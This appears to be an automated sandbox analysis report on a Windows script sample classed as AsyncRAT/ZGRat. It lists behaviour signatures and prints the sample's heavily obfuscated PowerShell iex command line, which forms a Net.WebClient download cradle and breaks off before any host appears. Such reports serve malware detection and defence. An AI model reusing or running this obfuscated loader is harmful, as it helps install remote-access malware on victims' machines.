Analysis Overview
SHA256
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Threat Level: Known bad
The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1) was found to be: Known bad.
Malicious Activity Summary
AsyncRat
ZGRat
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-23 12:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-23 12:29
Reported
2024-01-23 12:31
Platform
win7-20231215-en
Max time kernel
145s
Max time network
122s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM *aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦